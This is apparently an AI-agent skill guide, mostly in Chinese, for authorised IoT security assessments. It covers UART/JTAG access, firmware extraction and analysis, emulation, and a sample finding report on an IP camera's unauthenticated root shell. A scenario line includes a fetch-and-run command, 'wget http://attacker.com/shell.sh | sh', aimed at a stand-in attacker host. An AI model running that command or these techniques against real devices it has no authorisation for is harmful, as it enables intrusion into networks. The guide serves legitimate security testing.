Performs IoT security assessments testing hardware (UART/JTAG), firmware (Binwalk/Ghidra/QEMU), networks (Wireshark/Ubertooth), cloud APIs, and mobile apps to identify vulnerabilities across layers.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
- 在企业或关键基础设施环境部署前评估 IoT 设备的安全性
Performs security assessments of IoT devices and ecosystems via hardware debugging (UART/JTAG), firmware extraction/analysis (Binwalk/Ghidra), network protocol sniffing (Wireshark), cloud APIs, and mobile apps. For IoT pentesting and vulnerability hunting.
Performs IoT security assessments testing hardware interfaces via UART/JTAG, firmware with Binwalk/Ghidra, network protocols, cloud APIs, and mobile apps to find vulnerabilities.
Analyzes IoT network traffic from PCAP files or live captures to detect protocols (MQTT, CoAP, Zigbee) and security vulnerabilities like unencrypted comms or weak auth.
Share bugs, ideas, or general feedback.
不适用场景:未获得书面授权擅自测试 IoT 设备、修改非自有设备的固件,或未获得专项医疗设备测试授权和安全协议而测试医疗设备或安全关键系统。
检查物理设备并识别攻击面:
提取并分析设备固件:
flashrom -p ch341a_spi -r firmware.bin 读取md.b 内存转储)binwalk -e firmware.bin 提取文件系统、内核和引导加载程序组件grep -rn "password\|passwd\|secret\|key" squashfs-root//etc/shadow 中的密码哈希/etc/init.d/ 中的启动脚本,查找不安全的服务配置./firmwalker.sh squashfs-root/firmware-analysis-toolkit 进行自动化 CVE 扫描分析 IoT 设备的所有网络流量:
仿真固件进行动态安全测试:
python3 fat.py firmware.bin 在仿真环境中启动固件利用已识别漏洞演示影响:
| 术语 | 定义 |
|---|---|
| UART | 通用异步收发器;嵌入式设备上常用于调试控制台的串行通信接口,通常可提供 root shell 访问 |
| JTAG | 联合测试行动组;提供对处理器直接访问的硬件调试接口,可用于内存读取、代码调试和固件提取 |
| 固件(Firmware) | 存储在设备闪存中控制其运行的软件,通常由引导加载程序、操作系统内核和根文件系统组成 |
| Binwalk | 固件分析工具,可识别并提取固件镜像中嵌入的文件系统、压缩存档和二进制组件 |
| MQTT | 消息队列遥测传输;IoT 设备通信中常用的轻量级发布/订阅协议,通常在无认证情况下部署 |
| BLE | 低功耗蓝牙;许多 IoT 设备用于短距离通信的无线协议,若未妥善保护则易受窃听和未授权访问 |
背景:一家公司计划在办公室部署来自同一供应商的 200 台 IP 摄像头。部署前,安全团队要求对摄像头进行渗透测试,以识别可能被利用来访问企业网络的漏洞。
方法:
/etc/shadow 中发现硬编码凭据(root:$1$abc$hashedpassword),几秒内破解 MD5 哈希(密码:camera123); wget http://attacker.com/shell.sh | sh常见陷阱:
## 发现:通过 UART 调试接口的未认证 Root Shell
**ID**: IOT-001
**严重性**: 严重(CVSS 9.0)
**设备**: ModelCam X200 IP 摄像头(固件 v3.2.1)
**接口**: UART 串口控制台(115200 波特率,8N1)
**描述**:
该 IP 摄像头在 PCB 上暴露了一个 UART 串口接口,可在无需认证的情况下
直接提供 root shell 访问权限。能够物理接触设备的攻击者只需连接
USB 转 UART 适配器,即可获得嵌入式 Linux 操作系统的完整 root 访问权限。
**概念验证**:
1. 打开设备外壳(4 颗十字螺丝,无防拆检测)
2. 将 FTDI 适配器连接到 UART 引脚(PCB 上的 J3 接头)
3. 串口终端设置 115200 8N1:立即出现 root shell 提示符
4. root@camera:~# id -> uid=0(root) gid=0(root)
**通过 Root 访问发现的其他问题**:
- /etc/shadow 包含所有设备共享的硬编码 root 密码(camera123)
- 已配置网络的 WiFi 凭据以明文形式存储于 /etc/wireless.conf
- RTSP 流在 554 端口无需认证即可访问
**影响**:
对任何已部署摄像头的物理访问即可获得网络的 root 权限。
200 台摄像头部署于各办公室,每台摄像头都成为具备
root 级命令执行能力的潜在网络入口点。
**修复建议**:
1. 在生产固件中禁用 UART 控制台访问或要求认证
2. 移除硬编码凭据;使用制造时生成的每设备唯一密码
3. 使用硬件支持的密钥加密存储的 WiFi 凭据
4. 将摄像头部署在与企业网络隔离的 VLAN 上